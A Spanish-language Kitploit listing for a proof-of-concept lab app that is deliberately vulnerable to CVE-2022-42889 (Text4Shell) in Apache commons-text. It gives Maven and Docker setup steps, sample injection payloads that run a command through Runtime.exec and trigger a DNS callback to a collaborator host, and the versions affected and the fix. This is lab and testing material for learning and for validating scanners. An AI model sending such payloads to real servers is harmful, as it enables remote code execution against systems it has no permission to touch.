Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
text4shell-poc — Aplicación de prueba de concepto para probar CVE-2022-42889 | Kitploit
Herramientas/GitHubGitHub/securekomodo/text4shell-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubsecurekomodo/text4shell-poc

text4shell-poc

Aplicación de prueba de concepto para probar CVE-2022-42889

Ver Repositorio
811hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Aplicación de Prueba PoC para CVE-2022-42889

Esta es una aplicación vulnerable desarrollada como Prueba de Concepto para la vulnerabilidad CVE-2022-42889.

Instalación con Maven

Para ejecutarlo necesitarás:

  • JDK 17 o superior
  • Maven
  1. Clona el repositorio git
root@kitploit:~
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
  1. Instala con Maven para crear el JAR
root@kitploit:~
mvn clean install

Esto creará la carpeta ./target y dentro de esa carpeta debería estar el archivo JAR text4shell-poc-0.0.1-SNAPSHOT.jar

  1. Inicia el servidor web
root@kitploit:~
java -jar ./target/text4shell-poc-0.0.1-SNAPSHOT.jar

Esto iniciará un servidor web en tu localhost escuchando en el puerto 8080 por defecto

  1. Navega al servidor web

Accede al servidor web en http://localhost:8080/ y deberías ver la siguiente salida

root@kitploit:~
Text4Shell POC Test -@securekomodo
Send payloads to /reflected?poc=yourpayload
OR Send payloads to /blind with payload as your userAgent
  1. Explota manualmente o realiza un escaneo usando text4shell-scan

Ejemplos de payloads de explotación

root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/itworked')}
root@kitploit:~
${dns:<burp collaborator host>)}

Codificador de URL recomendado para una demostración de explotación exitosa: https://www.urlencoder.org/.

Docker

Alternativamente, puedes usar Docker para poder ejecutar este PoC:

  1. Clona el repositorio git
root@kitploit:~
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
  1. Construye la imagen Docker
root@kitploit:~
docker build --tag=text4shell-poc .
  1. Ejecuta el contenedor Docker
root@kitploit:~
docker run -p 80:8080 text4shell-poc
  1. Prueba la aplicación vulnerable
root@kitploit:~
http://localhost/
  1. El ataque se puede realizar pasando una cadena “${prefix:name}” como se muestra a continuación:
root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
root@kitploit:~
${dns:<burp collaborator host>)}

Codificador de URL recomendado para una demostración de explotación exitosa: https://www.urlencoder.org/.

Alternativamente, puedes validar la efectividad de herramientas de escaneo como text4shell-scan

¿Eres Vulnerable?

Para que tu código sea vulnerable necesitas:

  • Estar ejecutando una versión de Apache commons-text desde la versión 1.5.0 hasta (sin incluir) 1.10.0
  • Usar Interpolación para tu StringSubstituion (ver https://commons.apache.org/proper/commons-text/apidocs/org/apache/commons/text/StringSubstitutor.html) - ten en cuenta que esto no es muy común

La Solución

La solución es actualizar tus instancias de commons-text a las versiones 1.10.0 o posteriores.

Autor

Bryan Smith

  • Twitter: https://twitter.com/securekomodo
Descargar herramienta